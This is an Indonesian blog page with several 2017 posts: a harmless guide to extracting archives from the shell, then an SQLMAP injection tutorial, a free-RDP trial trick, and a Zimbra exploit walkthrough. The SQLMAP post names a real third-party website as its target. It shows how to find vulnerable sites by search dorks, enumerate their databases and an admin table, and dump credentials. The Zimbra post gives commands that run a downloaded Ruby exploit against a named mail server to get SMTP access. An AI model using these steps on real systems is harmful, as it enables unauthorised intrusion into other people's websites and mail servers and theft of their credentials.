Thursday, June 29, 2017

Cara Ekstrak File Lewat Shell

Sebagai Pekerja di Linux yang berfungsi sebagai server seringkali berbagai tools tidak disertakan tampilannya. Jadi mau nggak mau, kita mesti rajin bekerja dengan shell (command line). Kadang-kadang terasa kikuk juga sebenarnya. Bahkan hanya untuk melakukan ekstrak file, kita mesti melakukannya di console/shell. Padahal seringkali di lingkungan yang mendukung tampilan grafis penuh (GUI), cukup dengan klik kanan file, lalu pilih opsi ‘extract file’. Sederhana dan mudah.
Naa, sekarang mesti belajar juga bagaimana bisa bekerja di lingkungan yang minimalis dan serba command line. :). Ayo kita mulai. Begini, cara mengekstrak berbagai macam file arsip yang umum dipakai:
1. File ekstensi .tar.gz
<pre lang=”bash”>
tar -zxvf namafile.tar.gz
</pre>

atau
<pre lang=”bash” line=”1″>
gunzip namafile.tar.gz
tar -xvf namafile.tar

</pre>

2. File ekstensi .tar.bz2
<pre lang=”bash”>
tar -jxvf namafile.tar.bz2
</pre>

atau
<pre lang=”bash” line=”1″>
bunzip2

tar -xvf namafile.tar
</pre>


3. File ekstensi .zip
1
unzip namafile.zip
4. File ekstensi .rar
1
unrar x namafile.rar
5. File ekstensi .tar
1
tar -xvf namafile.tar

Okay untuk sementara itu hanya itu dulu yang dapat kami sampaikan ,,tentunya haya untuk anda-anda yang sering sekali berhadapan denga hal-hal di atas ..semoga bermanfaat..babay...

Tuesday, June 27, 2017

Tutorial SQLMAP Injection

Website merupakan sebuah aplikasi yang dibangun untuk dapat digunakan dan diakses oleh semua orang tanpa terkecuali. Kelebihan ini yang terkadang menjadi boomerang tersendiri bagi websitenya, karena kita tidak pernah tahu siapa saja yang mengakses, apakah orang tersebut berniat jahat atau tidak. 
Berikut ini adalah tahap demi tahap para Hacker Mengeksploitasi Website Korban.
1. Mencari website Vulnerable / Website yang masih terdapat BUG
Banyak cara yang dapat digunakan untuk mendapatkan website vulnerable, bisa menggunakan. Bisa dengan cara manual atau cara otomatis. Cara manual adalah cara ketika anda akan mengeksploitasi website – website tujuan anda, contoh ketika praktisi komputer akan mengeksploitasi website www.websitevulnerable.com, dengan manual halaman demi halaman akan di cek apakah terdapat peringatan mysql error atau tidak. Sedangkan Cara Otomatis sederhananya dapat dilakukan menggunakan pencarian di google.com dengan keyword pencarian sebagai berikut.


mencari-website-vulnerable
Mencari website vulnerable
Setelah anda cari akan tampil banyak website, salah satunya adalah website ini

http://www.bible-history.com/subcat.php?id=2
Kita sudah mendapatkan website target yaitu www.bible-history.com, kali ini kita akan mencoba eksploitasi website ini dengan menambahkan aksen atau tanda petik setelah variabel ?id=2 di alamat tersebut. Lihat Contoh Dibawah.

http://www.bible-history.com/subcat.php?id=2′
Apakah akan muncul pesan mysql error atau tidak. Hasilnya seperti gambar dibawah ini.



tutorial-hacking-dengan-sql-injection
Tutorial hacking dengan sql injection
Hasil error kita dapatkan. artinya website ini masih mempunyai bug, atau vulnerable.
Inti dari tahap 1 ini adalah mencoba-coba menyisipkan aksen ‘ pada halaman-halaman website hasil pencarian manual atau otomatis, apakah terdapat pesan error atau tidak, jika error maka website tersebut belum aman.
2. Siapkan Tool SQL Injection
Dibawah ini adalah macam-macam tool SQL Injection

Nama Tools Operating Sistem Download
Havij SQL Injection Windows Download
Pangolin – Automated SQL Injection Test Tool Windows Download
BSQL Hacker Windows Download
Safe3 SQL Injector Windows Download
The Mole Windows Download
SQLNinja SQL injection Linux Download
SQLMAP Linux / Windows Download


  • Masukan perintah berikut untuk melihat daftar database website target



Tutorial Sqlmap
Gambar Tutorial SQLMAP

/* sqlmap.py -u url_target --dbs */
sqlmap.py -u http://www.bible-history.com/subcat.php?id=2 --dbs

/*
Note : Url target tanpa tanda aksen '
Tanda aksen hanya digunakan untuk mengecek apakah suatu website masih error
*/

Hasil yang akan didapat adalah seperti gambar di bawah ini



Gambar Tutorial SQLMAP
Gambar Tutorial SQLMAP

Hasil dari perintah adalah sebuah kumpulan database yang dimiliki website korban. Tahap berikutnya adalah kita akan mencari informasi – informasi yang ada di dalam database diatas. Tujuan ini biasanya digunakan para Hacker untuk mencari user dan password user login pada website.

  • Masukan perintah berikut untuk melihat daftar Tabel dari database yang dipilih



Gambar Tutorial SQLMAP
Gambar Tutorial SQLMAP

/*sqlmap.py -u url_target -D database_target --tables*/

sqlmap.py -u http://www.bible-history.com/subcat.php?id=2 - D keywords --tables


Hasil yang akan didapat adalah seperti gambar di bawah ini



Gambar Tutorial SQLMAP
Gambar Tutorial SQLMAP

Hasil dari perintah adalah sebuah kumpulan daftar tabel dari database yang dipilih. Tahap berikutnya adalah kita akan mencari informasi – informasi yang ada di dalam tabel – tabel diatas.

  • Masukan perintah berikut untuk melihat informasi Tabel yang dipilih



Gambar Tutorial SQLMAP
Gambar Tutorial SQLMAP

/*sqlmap.py -u url_target -D database_target -T tabel_target --columns*/

sqlmap.py -u http://www.bible-history.com/subcat.php?id=2 - D keywords -T admin --columns

Hasil informasi tabel diatas sebagai berikut



Gambar Tutorial SQLMAP
Gambar Tutorial SQLMAP
 
CATATAN: 
Berikut adalah beberapa command penting di SQLMAP
Untuk melakukan scanning terhadap Target [URL]
./sqlmap.py -u[url]
Untuk mendapatkan informasi database Target [URL]
./sqlmap.py -u[url] –dbs
Untuk mendapatkan informasi table di database Target [URL]
./sqlmap.py -u [url] –tables -D [database]
Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL]
./sqlmap.py -u [url] –columns -T [table name] -D [databasename]
Untuk melakukan dump kolom, table dan database Target [URL]
./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename]
Untuk melakukan dump spesifik kolom Target [URL]
./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]

Baca terus artikel selanjutnya semoga bermanfaat. 

Thursday, June 22, 2017

Script Email Filter

Ya Kali ini saya akan mengeshare Script Email Filter Nyok langsung aja di sedot tanpa basa basi kalian udah pada kenal kan email filter?

Contoh Gambar:


Udah pada penasaran kan langsung aja Downloads
Klick
Semoga Artikel Bermanfaat.

Monday, June 19, 2017

Tips mendapatkan RDP Gratisan


langsung aja gan yanpa ba bi bu lagi....

1. buka site/situsnya : disini

2. Klik Try It Free


3. silahkan isi email klik start free trial 

4. Tunggu sampai proses selesai




5. Trus klik Download Setup File


7. Trus Klik yang di download
8. Klik Connect 
9. Masukin Username dan pass nanti di kasih 

   lihat contoh di bawah ini :

10. Klik Oke trus nunggu dah sepuluh menit kali

Cara Mudah Exploit Zimbra

sekarang saya ingin membuat turtorial cara mendapatkan 

smtp zimbra server langsung aja cekidot langsung ke 

artikelnya check it out..


Hot To Get SMTP Zimbra ( Cara Dapetin SMTP 
 
Zimbra )

1. Download Aplikasi Ruby Disini
 
2. Download Xploit Ruby nya DISINI
 
3. Install Aplikasi Ruby
 
4. Ubahh nama folder ruby22 jadi ruby
 
5. Masukan file rub.rb dan ultils.rb ke dalam
       
    folder 
 
C:\ruby\bin\
 
6. Buka CMD ( CTRL + R )
 
7. Ketik cd C:\ruby\bin
 
8. Ketik ruby run.rb -t mail.k-codex.gr -u 
 
usernamelu -p Passwordlu
 
9. Done.

Berikut Hasil Exploit :



Dork Zimbra Lsng aja Download Klick